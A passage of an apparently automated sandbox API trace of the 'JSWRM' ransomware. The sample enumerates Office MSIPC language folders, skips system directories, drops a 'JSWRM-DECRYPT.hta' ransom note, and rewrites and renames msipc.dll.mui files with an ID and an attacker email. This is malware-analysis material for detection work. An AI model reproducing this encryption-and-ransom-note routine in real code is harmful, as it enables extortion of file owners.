ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfb67b102, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb6ed802, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="th", cAlternateFileName="")) returned 1 [0136.906] lstrcmpiW (lpString1="th", lpString2=".") returned 1 [0136.906] lstrcmpiW (lpString1="th", lpString2="..") returned 1 [0136.906] lstrcmpiW (lpString1="th", lpString2="...") returned 1 [0136.906] lstrcmpiW (lpString1="th", lpString2="windows") returned -1 [0136.906] lstrcmpiW (lpString1="th", lpString2="recovery") returned 1 [0136.906] lstrcmpiW (lpString1="th", lpString2="perflogs") returned 1 [0136.906] lstrcmpiW (lpString1="th", lpString2="documents and settings") returned 1 [0136.907] lstrcmpiW (lpString1="th", lpString2="$RECYCLE.BIN") returned 1 [0136.907] lstrcmpiW (lpString1="th", lpString2="system volume information") returned 1 [0136.907] lstrcmpiW (lpString1="th", lpString2="msocache") returned 1 [0136.907] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\th\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\th\\jswrm-decrypt.hta")) returned 0xffffffff [0136.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.907] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\th\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\th\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.908] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.908] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.909] CloseHandle (hObject=0x238) returned 1 [0136.909] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\th\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\th\\jswrm-decrypt.hta")) returned 0x20 [0136.909] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\th\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb67b102, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfb6ed802, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x4842d625, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName=".", cAlternateFileName="")) returned 0x231f40 [0136.909] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.909] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb67b102, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfb6ed802, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x4842d625, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="..", cAlternateFileName="")) returned 1 [0136.909] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.910] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.910] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4842d625, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4842d625, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4842d625, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.910] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.910] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.911] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.911] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.911] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.911] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.911] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.911] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.911] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.911] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.912] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfb6ed802, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfb6ed802, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb713a45, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5098, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.912] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.912] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.912] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.912] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.912] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.912] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.912] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.912] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.912] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.912] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.912] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\th\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\th\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.913] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=20632) returned 1 [0136.913] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.913] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5090, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5090, lpOverlapped=0x0) returned 1 [0136.918] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.918] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5090, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5090, lpOverlapped=0x0) returned 1 [0136.918] CloseHandle (hObject=0x314) returned 1 [0136.918] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\th\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\th\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\th\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\th\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.919] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfb6ed802, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfb6ed802, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb713a45, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5098, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.920] FindClose (in: hFindFile=0x231f40 | out: hFindFile=0x231f40) returned 1 [0136.920] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc53b9f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc53b9f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc53b9f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="tr", cAlternateFileName="")) returned 1 [0136.920] lstrcmpiW (lpString1="tr", lpString2=".") returned 1 [0136.920] lstrcmpiW (lpString1="tr", lpString2="..") returned 1 [0136.920] lstrcmpiW (lpString1="tr", lpString2="...") returned 1 [0136.920] lstrcmpiW (lpString1="tr", lpString2="windows") returned -1 [0136.920] lstrcmpiW (lpString1="tr", lpString2="recovery") returned 1 [0136.920] lstrcmpiW (lpString1="tr", lpString2="perflogs") returned 1 [0136.920] lstrcmpiW (lpString1="tr", lpString2="documents and settings") returned 1 [0136.920] lstrcmpiW (lpString1="tr", lpString2="$RECYCLE.BIN") returned 1 [0136.920] lstrcmpiW (lpString1="tr", lpString2="system volume information") returned 1 [0136.920] lstrcmpiW (lpString1="tr", lpString2="msocache") returned 1 [0136.920] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\tr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\tr\\jswrm-decrypt.hta")) returned 0xffffffff [0136.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.920] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\tr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\tr\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.921] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.921] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.922] CloseHandle (hObject=0x238) returned 1 [0136.922] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\tr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\tr\\jswrm-decrypt.hta")) returned 0x20 [0136.923] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\tr\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc53b9f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc53b9f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x4845385f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName=".", cAlternateFileName="")) returned 0x232100 [0136.923] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.923] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc53b9f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc53b9f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x4845385f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="..", cAlternateFileName="")) returned 1 [0136.923] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.923] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.923] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4845385f, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4845385f, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4845385f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.923] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.923] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.923] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.923] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.923] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.923] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.923] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.923] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.923] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.923] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.923] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc53b9f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc53b9f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc646a83, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5098, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.923] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.923] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.923] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.923] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.923] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.924] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.924] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.924] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.924] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.924] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.924] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\tr\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\tr\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.925] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=20632) returned 1 [0136.925] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.925] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5090, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5090, lpOverlapped=0x0) returned 1 [0136.928] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.928] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5090, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5090, lpOverlapped=0x0) returned 1 [0136.928] CloseHandle (hObject=0x314) returned 1 [0136.928] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\tr\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\tr\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\tr\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\tr\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.929] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc53b9f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc53b9f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc646a83, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5098, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.929] FindClose (in: hFindFile=0x232100 | out: hFindFile=0x232100) returned 1 [0136.929] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf80d6078, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf80d6078, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf80d6078, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="uk", cAlternateFileName="")) returned 1 [0136.929] lstrcmpiW (lpString1="uk", lpString2=".") returned 1 [0136.929] lstrcmpiW (lpString1="uk", lpString2="..") returned 1 [0136.929] lstrcmpiW (lpString1="uk", lpString2="...") returned 1 [0136.929] lstrcmpiW (lpString1="uk", lpString2="windows") returned -1 [0136.929] lstrcmpiW (lpString1="uk", lpString2="recovery") returned 1 [0136.929] lstrcmpiW (lpString1="uk", lpString2="perflogs") returned 1 [0136.929] lstrcmpiW (lpString1="uk", lpString2="documents and settings") returned 1 [0136.929] lstrcmpiW (lpString1="uk", 